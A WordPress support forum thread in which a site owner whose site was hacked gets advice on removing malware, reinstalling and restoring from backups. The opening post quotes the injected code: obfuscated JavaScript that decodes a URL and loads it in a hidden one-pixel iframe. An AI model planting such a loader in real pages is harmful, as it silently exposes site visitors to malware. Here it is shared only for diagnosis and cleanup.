Support » Fixing WordPress » Malware Problem

  • Hi guys,

    Getting alerts from firefox whenever accessing my site (http://overratingtheunderrated.com) about badware/malware. I’ve found out through another forum that there is some bad code, but they haven’t told me where/how to find and delete it. Can anyone advise?

    This is the code: <script> function getfncelement(a) { if (a==0) return ‘A104A116A116A112A58A47A47A99A108A101A97A110A102A105A108A101A46A110A101A116A47A46A112A104A47A50A47’; if (a==1) return ‘split’; if (a==2) return ‘fromCharCode’; if (a==3) return ‘IFRAME’; if (a==4) return 1; } var gnitssssssssssssssssss = String;

    var a_bnMJnWIagV = getfncelement(0);
    var a_ErVOWoUayU = a_bnMJnWIagV[getfncelement(1)](“A”);
    var a_LEdeDyQRPa = “”;
    for (var a_frOsBBOKcu=1; a_frOsBBOKcu<a_ErVOWoUayU.length; a_frOsBBOKcu++)
    {a_LEdeDyQRPa+=gnitssssssssssssssssss[getfncelement(2)](a_ErVOWoUayU[a_frOsBBOKcu]);}
    var testFrame = document.createElement(getfncelement(3));
    testFrame.src = a_LEdeDyQRPa;
    testFrame.width = getfncelement(4);
    testFrame.height = getfncelement(4);
    document.body.appendChild(testFrame);

Viewing 15 replies - 1 through 15 (of 17 total)
  • I suggest removing your theme and resetting it to the default Twenty-Ten theme. Then you could just download a new copy of WordPress and replace all of the existing files with the new ones. Go through all of your directories via FTP to make sure there is nothing suspicious there. Remove any files or folders that aren’t part of WordPress or any other program that you KNOW you installed. Good luck!

    This could also be caused by a Plugin. Try deactivating all your Plugins then see if you still have the problem. Then (before deleting anything) switch your theme to the default theme (you might want to install the latest Twenty Ten version from the repo to be sure you switch to a clean theme).

    See if either of those do the trick..

    Thread Starter ajay182

    (@ajay182)

    Hi,

    Would removing my theme not result in losing all of my current theme options and such?

    Also, I’m quite new at all this sort of stuff, I’m not sure what it is that I should be looking for-ie, what is out of the ordinary.

    Yes it could do that is why I said don’t delete anything yet! You don’t need to right away, you can switch themes without deleting your current one (just make another one the active theme).

    Yeah, try what dgwyer suggests first. You can reset your theme to the default one without losing any of your settings. Theme settings are stored in the database, so they are not affected by the actual theme files on the server.

    Thread Starter ajay182

    (@ajay182)

    Hi,

    I’ve deactivated all plugins and changed theme but it is still showing up as a malware site.

    Even if you have cleaned out your code, it might still be flagged as malware in the browser because it has been temporarily blocked by Google(?).

    Thread Starter ajay182

    (@ajay182)

    How would I be able to confirm I have in fact cleaned out the code though? Nothing has changed between now and then.

    Thread Starter ajay182

    (@ajay182)

    I’ve lodged a request with google to reinstate me, but I’m not sure how to test whether the reinstalls etc actually got rid of the code.

    Delete the .maintenance file at root.

    You’re getting a malware warning because you’ve been hacked:
    http://www.google.com/safebrowsing/diagnostic?site=overratingtheunderrated.com

    A GoDaddy restore won’t necessarily fix that.

    See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress

    And

    Thread Starter ajay182

    (@ajay182)

    Hi,

    I’ve checked the Google webmaster link, that was where I got the code in the OP from. I’ve checked those links and have taken many of those steps already. It seems the only one I haven’t done is restored it to a backup version.

    Thread Starter ajay182

    (@ajay182)

    Google diagnostic is now showing there are other infections, specifically a couple of trojans. Is there no way to erase them without restoring a backup?

    Also, questions if I do have to restore a backup:

    -How do I do it?
    -Will I lose the extensive customisation on my theme?
    -I know I have to reinstall plugins-does that mean I lose statistics associated with the plugins (e.g. WordPress stats, akismet stats etc)?

    Moderator James Huff

    (@macmanx)

    Volunteer Moderator

    Google diagnostic is now showing there are other infections, specifically a couple of trojans. Is there no way to erase them without restoring a backup?

    Follow the guides that songdogtech linked to.

    Also, questions if I do have to restore a backup:

    -How do I do it?

    Follow this guide:

    http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Will I lose the extensive customisation on my theme?

    Not if they were backed up.

    I know I have to reinstall plugins-does that mean I lose statistics associated with the plugins (e.g. WordPress stats, akismet stats etc)?

    It’s always a possibility. I’d call it a fair trade-off for a clean site.

    Thread Starter ajay182

    (@ajay182)

    appreciate the reply. the backups were automated by a plugin and are in sql.gz format-are these the right backups? i’m being frightened by seeing backups in other formats hovering around!

    Thread Starter ajay182

    (@ajay182)

    Hi all,

    Problem seems to be OK now, I assume one of your recommendations above fixed thing-many thanks! Are there any steps I can take to secure my site?

Viewing 15 replies - 1 through 15 (of 17 total)
  • The topic ‘Malware Problem’ is closed to new replies.